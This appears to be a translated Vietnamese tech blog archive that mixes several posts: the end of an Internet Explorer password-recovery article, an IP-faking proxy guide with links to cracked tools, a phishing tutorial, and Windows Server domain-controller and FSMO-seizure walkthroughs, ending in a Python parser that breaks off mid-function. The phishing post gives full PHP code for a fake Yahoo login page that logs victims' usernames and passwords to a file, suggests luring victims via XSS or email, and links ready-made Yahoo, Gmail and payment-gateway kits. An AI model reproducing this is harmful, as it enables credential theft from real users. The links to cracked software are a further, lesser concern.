Content Advisor
The CA password, as already said, is not kept as plain text; instead, it is stored as a hash. In the CA password management dialog, it is enough to delete (you can restore the deleted password at any time later) or change this hash to unlock sites locked with CA. PIEPR will also display your password hint if there is one.

Asterisks passwords
This is PIEPR's fourth operating mode, which allows recovering Internet Explorer passwords hidden behind asterisks. To recover such a password, simply drag the magnifier to the window with the **** password. This tool also allows recovering passwords for other programs that use IE frames, e.g. Windows Explorer, some IE-based browsers, etc.

We have reviewed the basic Internet Explorer password recovery modes. There are also a number of additional features for viewing and editing cookies, cache, visited pages history, etc. We are not going to cover them in detail; instead, we are going to look at a few password recovery examples done with PIEPR.

Three Real-Life Examples.
Example 1: Recovering current user's FTP password

When opening an FTP site, Internet Explorer pops up the log on dialog (Figure 5).

FTP password dialog
Figure 5. FTP logon dialog.

If you have opened this site and set the 'Save password' option in the authentication dialog, the password must be saved in Protected Storage, so recovering it is a pretty trivial job. Select the automatic operating mode in PIEPR and then click 'Next'. Locate our resource in the dialog with decrypted passwords that appears (the site name must appear in the Resource Name column.)

As we see, the decryption of the current user's password should not cause any special difficulties. If the password is not found for some reason, don't forget to check IE's AutoComplete settings (Figure 2); possibly you have simply not set the program to save passwords.

Three Real-Life Examples.
Example 2: We will need to recover Web site passwords. The operating system is unbootable.

This is a typical, but not fatal situation. The necessity to recover Internet Explorer passwords after unsuccessful Windows reinstallation occurs just as often.

In either case, we will have user's old profile with all files within it. This set is normally enough to get the job done. In the case with the reinstallation, Windows providently saves the old profile under a different name. For example, if your account name was John, after renaming it may look like John.WORK-72C39A18.

The first and foremost thing you must do is to gain access to the files in the old profile. There are two ways of doing this:

  1. Install a new operating system, e.g. Windows XP, on a different hard drive and attach the old hard drive to it.

  2. Create a Windows NT boot disk. There are many different utilities for creating boot disks and USB flash disks available online. For instance, you can use WinPE or BartPE, or just use our Passcape ISO Burner. If your old profile was stored on an NTFS partition of your hard drive, the boot disk will have to support NTFS.

Let's take the first route. Once we gain access to the old profile, we will need to make the system show hidden and system files; otherwise, the files we need will be invisible. Open Control Panel, click on Folder Options, and then select the View tab. On this tab, find the option 'Show hidden files and folders' and select it. Clear the option 'Hide protected operating system files'. When the necessary passwords are recovered, it's better to reset these options to the way they were set before.

Open the program's wizard in the manual mode and enter the path to the old profile's registry file. In our case, that is C:\Documents And Settings\John.WORK-72C39A18\ntuser.dat, where John.WORK-72C39A18 is the old account name. Click 'Next'.

This data should normally be sufficient for recovering Internet Explorer passwords. However, if there is at least a single encrypted FTP password, the program will request additional data, without which it will not be able to recover such types of passwords (Figure 4):

  • User's password
  • User's Master Key
  • User's SID.

Normally, the program finds the last two items in the user's profile and fills in that data automatically. However, if that didn't happen, you can do it by hand: copy ntuser.dat and the folder with the Master Key to a separate folder. It is important to copy the entire folder, for it may contain several keys, and the program will select the right one automatically. Then enter the path to the ntuser.dat file that you have copied to the other folder.

That's it. Now we need to enter the old account password, and the recovery will be complete. If you don't care about FTP passwords, you can skip the dialog for entering the user's password, Master Key, and SID.

Three Real-Life Examples.
Example 3: Recovering uncommonly stored passwords.

Sometimes, when we open a website in the browser, an authentication dialog appears. However, PIEPR fails to recover its password in either automatic or manual mode. The 'Save password' option in Internet Explorer is enabled. We need to recover this password.

Indeed, some websites don't let the browser save passwords in the auto-complete password list. Often, such websites are written in Java, or they use alternative password storage methods; e.g., they store passwords in cookies.

If the password field is filled with asterisks, the solution is clear: select the ASTERISKS PASSWORDS operating mode and then open the magic magnifier dialog. Then simply drag the magnifier to the Internet Explorer window (Figure 6).

Asterisks passwords revealer
Figure 6. The password is behind the asterisks.

The password (or passwords, if the Internet Explorer window has several fields with asterisks) will appear in the PIEPR window (Figure 7).

Internet Explorer asterisks passwords
Figure 7. Magnifying glass in use.

But it is not always that simple. The password field may be empty, or the field may indeed contain *****. In that case, as you have guessed by now, the ASTERISKS PASSWORDS tool will be useless.

We can assume the password is stored in cookies. Let's try to locate it. Choose the IE Cookie Explorer tool (Figure 8).

IE Cookie Explorer
Figure 8. IE Cookie Explorer.

The dialog that appears will list the websites that store cookies on your computer. Click on the URL column header to sort the list of websites alphabetically. This will help us find the right website more easily. Go through the list of websites and select the one we need. The list below will display the decrypted cookies for this website (Figure 9).

Decrypted cookies
Figure 9. Decrypted cookies.

As the figure shows, in our case the login and password are not encrypted and are stored as plain text.

Cookies are often encrypted. In that case, you are not likely to succeed in recovering the password. The only thing you can try in order to recover the old account is to create a new account. Then you will be able to copy the old cookies into a text editor and replace them with the new ones. However, this is only for when the worst comes to the worst; it is not recommended for normal use.

Don't forget also that just about all pages and forms with passwords have the 'Forgot password' button.

Conclusion

As this article shows, recovering Internet Explorer passwords is a pretty simple job, which does not require any special knowledge or skills. However, despite the seeming simplicity, the password encryption schemes and algorithms are very well thought through and just as well implemented. Although the Protected Storage concept is over 10 years old, don't forget that it has earned the very best recommendations from experts and has been implemented through three generations of this popular browser.

With the release of the next, 7th version of IE, Microsoft is preparing fundamentally new schemes for protecting our private data, which use improved encryption algorithms and eliminate the shortcomings of Protected Storage.

In particular, analysis of the preliminary beta versions of Internet Explorer 7 has revealed that autoform password encryption keys are no longer stored along with the data. They are not stored, period! This is a small piece of know-how that will be appreciated at its true worth by both professionals and end users, who will benefit from it in the end.

But the main thing is that the release of the new concept will eliminate the major drawback of Protected Storage, which is the possibility of recovering passwords without knowing any additional information. In other words, it was enough for a potential attacker to gain physical access to the contents of a hard drive in order to steal or damage passwords and the user's other private data. With the release of Internet Explorer 7, the situation will change somewhat.

Meanwhile, we will only have to wait impatiently for the advent of Windows Vista and IE 7 to take a closer look at new encryption mechanisms used in the next generation of this popular browser.

This document may be freely distributed or reproduced provided that the
reference to the original article is placed on each copy of this document.
(c) 2006 Passcape Software. All rights reserved.



*1 Human memory can be split into two categories: short-term memory and long-term memory. For the purpose of memorizing information, human beings activate short-term memory, which is characterized by limited volume. When the volume is overloaded, new information that enters the memory partially pushes the old information out, and it permanently disappears. To store information in short-term memory, one needs to keep constant attention on the material being memorized for the entire period during which the material is to stay in memory. If one doesn't repeat the information stored in memory for a certain period of time (e.g., a new password), that information can permanently or partially fall out of the sphere of consciousness and never end up in long-term memory.

*2 USERNAME.PWL (where USERNAME is your logon name) is a PassWord List file. It records passwords to resources on the network and uses them to reconnect to those resources so you don't have to type the password again.

*3 Protected Storage provides applications with an interface to store user data that must be kept secure or free from modification. Units of data stored are called Items. The structure and content of the stored data is opaque to the Protected Storage system. Access to Items is subject to confirmation according to a user-defined Security Style, which specifies what confirmation is required to access the data, such as whether a password is required. In addition, access to Items is subject to an Access rule set. There is an Access rule for each Access Mode: for example, read/write. Access rule sets are composed of Access Clauses. Typically at application setup time, a mechanism is provided to allow a new application to request from the user access to Items that may have been created previously by another application.
Items are uniquely identified by the combination of a Key, Type, Subtype, and Name. The Key is a constant that specifies whether the Item is global to this computer or associated only with this user. The Name is a string, generally chosen by the user. Type and Subtype are GUIDs, generally specified by the application. Additional information about Types and Subtypes is kept in the system registry and includes attributes such as Display Name and UI hints. For Subtypes, the parent Type is fixed and included in the system registry as an attribute. Items grouped under a Type are used for a common purpose, for example Payment or Identification. Items grouped under a Subtype share a common data format.
We'll try to cover the Protected Storage structure in one of the upcoming articles.

*4 Starting with Microsoft Windows 2000, the operating system began to provide a Data Protection Application Programming Interface (DPAPI). This is simply a pair of function calls that provide OS-level data protection services to user and system processes. By OS-level, we mean a service that is provided by the operating system itself and does not require any additional libraries. By data protection, we mean a service that provides confidentiality of data through encryption. Since the data protection is part of the OS, every application can now secure data without needing any specific cryptographic code other than the necessary function calls to DPAPI. These calls are two simple functions with various options to modify DPAPI behavior. Overall, DPAPI is a very easy-to-use service that will benefit developers who must provide protection for sensitive application data, such as passwords and private keys.
DPAPI is a password-based data protection service: it requires a password to provide protection. The drawback, of course, is that all protection provided by DPAPI rests on the password provided. This is offset by DPAPI using proven cryptographic routines, specifically the strong Triple-DES and AES algorithms, and strong keys, which we'll cover in more detail later. Since DPAPI is focused on providing protection for users and requires a password to provide this protection, it logically uses the user's logon password for protection.
DPAPI is not responsible for storing the confidential information it protects. It is only responsible for encrypting and decrypting data for programs that call it, such as Windows Credential manager, the Private Key storage mechanism, or any third-party programs.
Please refer to microsoft.com for more information.

*5 A Master Key is key material from which other encryption/decryption keys are derived.

*6 SID - Security IDentifier

*7 A cookie is a small bit of text that accompanies requests and pages as they go between the Web server and browser. The cookie contains information the Web application can read whenever the user visits the site. Cookies provide a useful means in Web applications to store user-specific information. For example, when a user visits your site, you can use cookies to store user preferences or other information. When the user visits your Web site another time, the application can retrieve the information it stored earlier.
Cookies are used for all sorts of purposes, all relating to helping the Web site remember you. In essence, cookies help Web sites store information about visitors. A cookie also acts as a kind of calling card, presenting pertinent identification that helps an application know how to proceed.
But cookies are often criticized for weak security and inaccurate user identification.
Please refer to microsoft.com to read more.


reflink: http://www.passcape.com/internet_explorer_passwords

[Net] Sock

Why fake your IP?
Many websites today offer software downloads and hosting registration, but most of them restrict Vietnamese IPs (because of too much freeloading), so you have to fake your IP to make those tasks easier.
Two ways to fake your IP

There are 2 kinds of proxy: SOCKS proxies and HTTP proxies. In terms of anonymity, SOCKS is safer.

Purpose:

+ Anonymity on the Net, protecting your information.
+ Bypassing firewalls. If your workplace is blocked by a firewall, a proxy is the way for you to reach outside websites.

How to: illustrated with the Internet Explorer browser

+ HTTP Proxy
Tools menu --> Internet Options --> Connections tab --> LAN Settings

+ SOCKS Proxy
Tools menu --> Internet Options --> Connections tab --> LAN Settings --> Advanced

Websites that provide proxies:

www.freeproxy.ru
www.rrdb.org
www.proxycity.com
www.proxy4free.com
www.aliveproxy.com

Second way:

Faking your IP with Sockcap

Unzip and run, no installation needed. First, Sockcap asks for configuration; follow the picture:

Since we need to fake the IP for the Internet Explorer browser, we must tell Sockcap:

Double-click the Internet Explorer icon inside Sockcap to open it. Note that IE must be opened through Sockcap like this.
Check whether the IP has changed: go here --> www.ip2location.com
If you use a proxy with a US IP, it will report that your current IP is in the US. Great, isn't it!?

@Collected!

How to fake your IP with the Firefox browser! If you use it, do it like this!
Choose the Tools menu => go to Options... => the panel below

go in there, then to the Advanced tab underlined in red! This panel appears:

Choose the Network tab and click the Settings button; this panel appears.

Tick the box I circled in red!
Boxes 1 and 2 are where you enter the IP of the SOCKS or proxy and the port of the SOCKS or proxy! Enter whichever you have, proxy or SOCKS? Enter only one, whatever you have, but it must be a live one!

When done, just OK => OK

Now start testing whether you have succeeded! You can test with the page Ngoaingutinhoc.net gave, or with the page below
Run http://rrdb.org ==>

Finding good SOCKS: Socks Proxy Search v2.0 full and checking SOCKS with full info

Follow the pictures:

First download Socks Proxy Search v2.0 full, install it and crack it by putting the serial.key file into the installation folder (drive C). The interface looks like this:
Step 1: Click "Fnd" to scan for SOCKS; when the scan finishes, save them by port.

Finally, go into Proxyfirewall to get the live SOCKS. Done.

Code:
http://www.mediafire.com/file/ddoeg1ejwyy/SocksProxySearchv2.0_wWw.SoftProVn.Net.rar

Proxyfirewall

Code:
http://www.mediafire.com/file/imodmwlkzmj/Proxyfirewall_wWw.SoftProVn.Net.rar
:pw:
Code:
wWw.SoftProVn.Net

6/22/10

[MASM] Basic MASM tutorials

http://cdbt.edu.vn/Resources/Item/92/Noi%20dung%20Assembly%20v%209-05.doc

http://www.ictu.edu.vn/LinkClick.aspx?fileticket=U7Wbbvyifjk%3D&tabid=209&mid=1139

http://saimete.edu.vn/saimete/index.php?option=com_docman&task=doc_download&gid=32&Itemid=222

http://ccd.hua.edu.vn/ncthang/download/VXL/Chuong03.pdf

http://tailieu.vn/xem-tai-lieu/su-dung-masm-de-xay-dung-chuong-trinh.116495.html

6/13/10

[Hacking] Guide to making a fake Yahoo page to steal passwords

- The other day I visited the school's website and saw it had loads of XSS bugs... I stayed up late watching the 2010 Champions League quarter-final MU-Bayern and, having nothing to do, poked at the XSS bug for fun (tomorrow I'll bring my laptop home and make a video for you; my PC is too sluggish to run it right now)

- While I'm at it, let me also show you how to make a fake yahoo, gmail... login page to steal passwords...

- How to get people to log in through that fake yahoo page is up to you: exploit an XSS bug, send the victim a link and talk them into it, email... whatever you can improvise

- My request is that when you read this guide you follow along and understand why each step is done the way it is :)

- This is ancient, from the Hùng Vương era, but sometimes you still need to dig it out and use it... old stuff that's rare and many people don't notice.

1/ First, open Notepad and type the following:
<?php
$now = date("H:i:s Y-m-d");
$ten = $_POST['login'];
$matkhau = $_POST['passwd'];
$f=fopen("yahoo_.txt","a");
fwrite($f," $now ---- User: $ten ---- Pass: $matkhau ----\n");
fclose($f);
?>
<html><body>
<script>location.href="http://mail.yahoo.com"</script>
</body></html>

Save it as yahoo.php

2/ Create another file, y.txt, with empty content
3/ Go to mail.yahoo.com and Save As the whole web page
- Open the htm file with WordPad or some other editor such as Notepad, Notepad++, EditPlus...
Find the line:
<form method="post" action="https://login.yahoo.com/config/login?" autocomplete="off" name="login_form" onsubmit="return hash2(this)">

And replace it with
<form name="login_form" action="y.php" method="post">

4/ Now you just upload it to a host (one that supports php). And CHMOD the file y.txt to 777
5/ Done...

+++ Besides, you can fake the login form of any site in the same way as above

- Ready-made fake yahoo login code:
http://www.mediafire.com/?mm2wtzicikq

- Ready-made fake gmail login code:
http://www.mediafire.com/?wtz1umiiyyk

- Ready-made fake paygate.vtc.vn login code:
http://www.mediafire.com/?nwwegjzqzjh

reflink: http://vn.360plus.yahoo.com/romeo_nhonguoi_2012/article?mid=61

6/12/10

[Net] Windows Server 2003 Network Administration Course, Chapter 2 – Setting up 2 Domain Controllers running in parallel

Chapter - 2

SETTING UP 2 DOMAIN CONTROLLERS RUNNING IN PARALLEL

This chapter consists of 2 parts:

Part 1 – Setting up 2 Domain Controllers running in parallel.

Part 2 – Distributed File System (DFS).


http://www.docstoc.com/docs/12372009/Chuong-2---Thiet-lap-nhieu-Server-chay-song-song-va-DFS

[Net] Setting up servers running in parallel – Parts I, III

- Step 1: Build a Domain Controller on Server1
- Step 2: Join Server2 to Server1's domain and promote Server2 to a Domain Controller
- Step 3: Synchronize the 2 servers, enable Global Catalog
- Step 4: Join the client machine to the domain
- Step 5: Disable cached logon and test by shutting down one of the 2 Domain Controllers.

Server 1: Promote to domain controller

Set a static IP for the DC with these parameters:
IP: 192.168.1.10
NetMask: 255.255.255.0
Preferred DNS Server: 192.168.1.10
(Lately the network is slow and reaching the forum is very hard, so I'm not posting pictures for this step; besides, this step is easy and very basic, surely everyone knows it.)
• Go to Start -> Run -> run DCPROMO to promote the machine to Domain Controller
• In the “Active Directory Installation Wizard” window, click Next
• Domain Controller Type: choose Domain controller for a new domain and click Next
• In the Create New Domain pane, choose Domain in a new forest
• New Domain Name pane: enter your domain (e.g. abc.com, tencongty.com.vn…)
• NetBIOS Domain Name: leave the default value
• Accept the default values for the folders holding the system configuration
• DNS Registration Diagnostics: choose Install and configure the DNS server on this computer, and set this computer to use this DNS server as its preferred DNS server
• Permissions: choose Permissions compatible only with Windows 2000 or Windows Server 2003 operating systems…
• Directory Services Restore Mode Administrator Password: enter a password if you need one.
• Choose Finish to complete the installation and reboot.
After rebooting, create a user named “u1”, password: 123 (???)

2/ Server 2: Join the domain and promote to domain controller.

A/ Join domain:

Set a static IP for server2 with these parameters:
IP: 192.168.1.20
NetMask: 255.255.255.0
Preferred DNS Server: 192.168.1.10

Right-click My Computer / Properties / Computer Name / Change
Enter the domain name “anthaifood.com” in the domain box (the domain I used for this experiment is anthaifood.com)

After OK, a window appears asking for a user to join the domain; enter user: administrator (the user on server1)

OK, reboot server 2

B/ Build the Domain Controller

After rebooting Server2, go to Start -> Run -> run DCPROMO to promote the machine to Domain Controller. (???)

In the “Active Directory Installation Wizard” window, click Next
In the “Domain Controller Type” window choose Additional domain controller for an existing domain.

Network Credentials: enter the administrator username & password of server1

Leave the defaults in these windows

Directory Services Restore Mode Administrator Password: enter a password if needed (this is the password required when we restore the Domain Controller)

At this window, wait a moment.

At this point it has succeeded; choose Finish to complete the installation and reboot.

C/ Build DNS:

Reset the IP for server2 with these parameters:
IP: 192.168.1.20
NetMask: 255.255.255.0
Preferred DNS Server: 192.168.1.20

Go to Control Panel -> Windows Components, choose Details
Under Networking Services choose Domain Name System (DNS) and click OK, then Next to install.

3/ Synchronize the 2 servers and join the client to the domain

A/ Server1:

Start -> Programs -> Administrative Tools -> Active Directory Sites and Services

In the Active Directory Sites and Services window choose Sites -> Default-First-Site-Name -> Servers; you will see the 2 servers. Open the properties of each server's NTDS Settings and check Global Catalog.

Point Server1's Alternate DNS Server to Server2 (192.168.1.20)

B/ Server 2:
Point Server2's Alternate DNS Server to Server1 (192.168.1.10)

Reboot Server1 & Server2

4/ Client machine:

Set a static IP for the Client with these parameters:
IP: 192.168.1.2
NetMask: 255.255.255.0
Preferred DNS Server: 192.168.1.10
Alternate DNS Server : 192.168.1.20

Right-click My Computer / Properties / Computer Name / Change
Enter the domain name “anthaifood.com” in the domain box; when asked for a username and password, enter the Domain Controller (DC) administrator account
Reboot the Client

After rebooting, log in with this account: user: u1 / password: 123

5/ Testing:

Shut down one of the 2 servers and the client can still log in to the DC; create u2, u3… for further tests.
Note: disable cached logon in local policy (interactive logon) for the test to be accurate (???)


reflink: http://roseandgun.wordpress.com/2008/04/09/thi%E1%BA%BFt-l%E1%BA%ADp-server-ch%E1%BA%A1y-song-song-ph%E1%BA%A7n-i/


PART III: Operation Master

Introduction: Although W2k/W2k3 support Multi Master (the DCs operate in parallel, with no primary/secondary distinction), some functions still operate in Single Master mode, namely:
1. Schema Master: manages the schema, one per forest
2. Domain Naming: manages the list of domains, one per forest
3. PDC: emulates an NT server to authenticate old workstations (win9x), one per domain
4. RID: issues IDs to users, one per domain
5. Infrastructure: manages the list of users from other domains participating in groups of the current domain, one per domain

By default these functions are held by DC1. When DC1 dies, operations that depend on these 5 functions can no longer be performed.

When DC1 “dies suddenly”, we need to “force” DC2 to take over these 5 functions. This article walks through the steps of this “forcing” (seizure) in detail.

This article has 3 steps:
1. Suppose the master DC dies (DC1 “dies” unexpectedly)
2. From the additional DC (DC2), open CMD and type the commands to seize DC1's 5 single-master functions onto DC2
3. After success, DC2 creates a user and the client joins the domain with the newly created user.

Procedure
1./ suppose DC1 dies (shut down DC1)
2./ from DC2, open cmd and type the commands to seize DC1's 5 single-master functions onto DC2
The command sequence is as follows: (copied from the DOS screen)
——————————————————–
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\>ntdsutil 'First command in the Operation Master procedure
ntdsutil: ?
'Commands in 'ntdsutil'
? – Show this help information
Authoritative restore – Authoritatively restore the DIT database
Configurable Settings – Manage configurable settings
Domain management – Prepare for new domain creation
Files – Manage NTDS database files
Group Membership Evaluation – Evaluate SIDs in token for a given user or group
Help – Show this help information
LDAP policies – Manage LDAP protocol policies
Metadata cleanup – Clean up objects of decommissioned servers
Popups %s – (en/dis)able popups with “on” or “off”
Quit – Quit the utility
Roles – Manage NTDS role owner tokens
Security account management – Manage Security Account Database – Duplicate SID Cleanup
Semantic database analysis – Semantic Checker
Set DSRM Password – Reset directory service restore mode administrator account password

ntdsutil: Roles 'Second command in the Operation Master procedure
fsmo maintenance: ?
'Commands in 'Roles'
? – Show this help information
Connections – Connect to a specific domain controller
Help – Show this help information
Quit – Return to the prior menu
Seize domain naming master – Overwrite domain role on connected server
Seize infrastructure master – Overwrite infrastructure role on connected server
Seize PDC – Overwrite PDC role on connected server
Seize RID master – Overwrite RID role on connected server
Seize schema master – Overwrite schema role on connected server
Select operation target – Select sites, servers, domains, roles and naming contexts
Transfer domain naming master – Make connected server the domain naming master
Transfer infrastructure master – Make connected server the infrastructure master
Transfer PDC – Make connected server the PDC
Transfer RID master – Make connected server the RID master
Transfer schema master – Make connected server the schema master

fsmo maintenance: connections 'Third command in the Operation Master procedure
server connections: ?
'Commands in 'connections'
? – Show this help information
Clear creds – Clear prior connection credentials
Connect to domain %s – Connect to DNS domain name
Connect to server %s – Connect to server, DNS name or IP address
Help – Show this help information
Info – Show connection information
Quit – Return to the prior menu
Set creds %s %s %s – Set connection creds as domain, user, pwd.
Use “NULL” for null password,
* to enter password from the console.

server connections: connect to server ser.anthaifood.com 'Fourth command in the Operation Master procedure
Binding to ser.anthaifood.com …
Connected to ser.anthaifood.com using credentials of locally logged on user.
server connections: quit 'Fifth command in the Operation Master procedure

fsmo maintenance: seize schema master 'Sixth command in the Operation Master procedure
Attempting safe transfer of schema FSMO before seizure.
ldap_modify_sW error 0x34(52 (Unavailable).
Ldap extended error message is 000020AF: SvcErr: DSID-0321032A, problem 5002 (UNAVAILABLE), data 1722
(A prompt appears, choose “YES”)

Win32 error returned is 0x20af(The requested FSMO operation failed. The current FSMO holder could not be contacted.))
Depending on the error code this may indicate a connection,
ldap, or role transfer error.
Transfer of schema FSMO failed, proceeding with seizure …
Server “ser.anthaifood.com” knows about 5 roles
Schema – CN=NTDS Settings,CN=SER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=com
Domain – CN=NTDS Settings,CN=SERVER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=com
PDC – CN=NTDS Settings,CN=SERVER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=com
RID – CN=NTDS Settings,CN=SERVER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=com
Infrastructure – CN=NTDS Settings,CN=SERVER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=com

fsmo maintenance: seize domain naming master 'Seventh command in the Operation Master procedure
Attempting safe transfer of domain naming FSMO before seizure.
ldap_modify_sW error 0x34(52 (Unavailable).
Ldap extended error message is 000020AF: SvcErr: DSID-0321032A, problem 5002 (UNAVAILABLE), data 1722
(A prompt appears, choose “YES”)

Win32 error returned is 0x20af(The requested FSMO operation failed. The current FSMO holder could not be contacted.))
Depending on the error code this may indicate a connection,ldap, or role transfer error.
Transfer of domain naming FSMO failed, proceeding with seizure …
Server “ser.anthaifood.com” knows about 5 roles
Schema – CN=NTDS Settings,CN=SER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=com
Domain – CN=NTDS Settings,CN=SER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=com
PDC – CN=NTDS Settings,CN=SERVER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=com
RID – CN=NTDS Settings,CN=SERVER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=com
Infrastructure – CN=NTDS Settings,CN=SERVER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=com

fsmo maintenance: seize RID master 'Eighth command in the Operation Master procedure (RID in capitals)
Attempting safe transfer of RID FSMO before seizure.
ldap_modify_sW error 0x34(52 (Unavailable).
Ldap extended error message is 000020AF: SvcErr: DSID-03210922, problem 5002 (UNAVAILABLE), data 1722
(A prompt appears, choose “YES”)

Win32 error returned is 0x20af(The requested FSMO operation failed. The current FSMO holder could not be contacted.))
Depending on the error code this may indicate a connection,ldap, or role transfer error.
Transfer of RID FSMO failed, proceeding with seizure …
Searching for highest rid pool in domain
Server “ser.anthaifood.com” knows about 5 roles
Schema – CN=NTDS Settings,CN=SER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=com
Domain – CN=NTDS Settings,CN=SER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=com
PDC – CN=NTDS Settings,CN=SERVER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=com
RID – CN=NTDS Settings,CN=SER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=com
Infrastructure – CN=NTDS Settings,CN=SERVER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=com

fsmo maintenance: seize PDC 'Ninth command in the Operation Master procedure (PDC in capitals)
Attempting safe transfer of PDC FSMO before seizure.
ldap_modify_sW error 0x34(52 (Unavailable).
Ldap extended error message is 000020AF: SvcErr: DSID-03210511, problem 5002 (UNAVAILABLE), data 1722
(A prompt appears, choose “YES”)

Win32 error returned is 0x20af(The requested FSMO operation failed. The current FSMO holder could not be contacted.))
Depending on the error code this may indicate a connection,
ldap, or role transfer error.
Transfer of PDC FSMO failed, proceeding with seizure …
Server “ser.anthaifood.com” knows about 5 roles
Schema – CN=NTDS Settings,CN=SER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=com
Domain – CN=NTDS Settings,CN=SER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=com
PDC – CN=NTDS Settings,CN=SER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=com
RID – CN=NTDS Settings,CN=SER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=com
Infrastructure – CN=NTDS Settings,CN=SERVER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=com

fsmo maintenance: seize infrastructure master 'Tenth command in the Operation Master procedure
Attempting safe transfer of infrastructure FSMO before seizure.
ldap_modify_sW error 0x34(52 (Unavailable).
Ldap extended error message is 000020AF: SvcErr: DSID-0321032A, problem 5002 (UNAVAILABLE), data 1722
(A prompt appears, choose “YES”)

Win32 error returned is 0x20af(The requested FSMO operation failed. The current FSMO holder could not be contacted.))
Depending on the error code this may indicate a connection,
ldap, or role transfer error.
Transfer of infrastructure FSMO failed, proceeding with seizure …
Server “ser.anthaifood.com” knows about 5 roles
Schema – CN=NTDS Settings,CN=SER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=com
Domain – CN=NTDS Settings,CN=SER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=com
PDC – CN=NTDS Settings,CN=SER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=com
RID – CN=NTDS Settings,CN=SER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=com
Infrastructure – CN=NTDS Settings,CN=SER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=com
fsmo maintenance: quit 'Eleventh command in the Operation Master procedure
ntdsutil: quit 'Twelfth command in the Operation Master procedure
Disconnecting from ser.anthaifood.com…

C:\>
——————————————————–

3./ Now we test it: on DC 2 (just promoted to master) we create a user, and from the client we can join the domain with the newly created user.
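To verify a seizure like the one above without reading all five "knows about 5 roles" reports by eye, here is an added Python example (not part of the original post, and not an ntdsutil feature) that parses that report block and lists which roles are still held by the dead DC. The sample reports are constructed from the transcript above, with SERVER standing for DC1 and SER for DC2; running this check before the metadata cleanup in Part 4 catches a skipped seize step, since a role still pointing at the dead DC cannot be exercised.

```python
import re
from typing import Dict, List

# The five single-master (FSMO) roles, in the order ntdsutil reports them.
FSMO_ROLES = ("Schema", "Domain", "PDC", "RID", "Infrastructure")

# Header of the report: Server "ser.anthaifood.com" knows about 5 roles
# (straight or curly quotes, since the blog rendered them as curly).
_HEADER_RE = re.compile(r'Server ["“](?P<server>[^"”]+)["”] knows about (?P<count>\d+) roles')
# Role line: <Role> - CN=NTDS Settings,CN=<DC>,CN=Servers,...  (the "-" may be an en dash)
_ROLE_RE = re.compile(r'^(?P<role>Schema|Domain|PDC|RID|Infrastructure)\s+[-–]\s+(?P<dn>CN=.+)$')

# Constructed sample, adapted from the transcript above: the report printed right after
# "seize schema master", when only the schema role has moved from SERVER (dead DC1) to SER (DC2).
AFTER_SCHEMA_SEIZE = """\
Server "ser.anthaifood.com" knows about 5 roles
Schema - CN=NTDS Settings,CN=SER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=com
Domain - CN=NTDS Settings,CN=SERVER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=com
PDC - CN=NTDS Settings,CN=SERVER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=com
RID - CN=NTDS Settings,CN=SERVER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=com
Infrastructure - CN=NTDS Settings,CN=SERVER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=com
"""
# Constructed sample: the same report once all five seizures have completed.
AFTER_ALL_SEIZURES = AFTER_SCHEMA_SEIZE.replace("CN=SERVER,", "CN=SER,")


def _dc_from_ntds_dn(dn: str) -> str:
    """Extract the DC name from an NTDS Settings DN, e.g. 'SER' from
    'CN=NTDS Settings,CN=SER,CN=Servers,...'. These DNs contain no escaped
    commas, so a plain split on ',' is safe here."""
    rdns = [part.strip() for part in dn.split(",")]
    if len(rdns) < 3 or rdns[0] != "CN=NTDS Settings" or rdns[2] != "CN=Servers":
        raise ValueError(f"unexpected NTDS Settings DN layout: {dn}")
    return rdns[1][len("CN="):]


def parse_role_report(text: str) -> Dict[str, str]:
    """Parse one 'knows about N roles' block into {role: DC name}.
    Raises ValueError if a role is missing or the header count disagrees."""
    holders: Dict[str, str] = {}
    announced = None
    for raw in text.splitlines():
        line = raw.strip()
        header = _HEADER_RE.search(line)
        if header:
            announced = int(header.group("count"))
            continue
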